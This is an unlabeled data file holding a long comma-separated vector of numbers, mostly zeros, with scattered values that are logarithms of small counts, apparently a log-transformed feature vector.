0.0, 0.0, 0.0, 0, 1.3862943611198906, 1.6094379124341003, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.624972813284271, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 3.4825185607408002, 0, 3.0841946160253872, 4.969640753475787, 3.0841946160253872, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.713572066704308, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 3.8918202981106265, 4.06534854782536, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 4.518263445217987, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 18.468344649580203, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 3.4011973816621555, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.871201010907891, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 2.550898738446989, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 4.356708826689592, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2958368660043296, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 6.2166061010848646, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.238324625039507, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 5.081404364984463, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 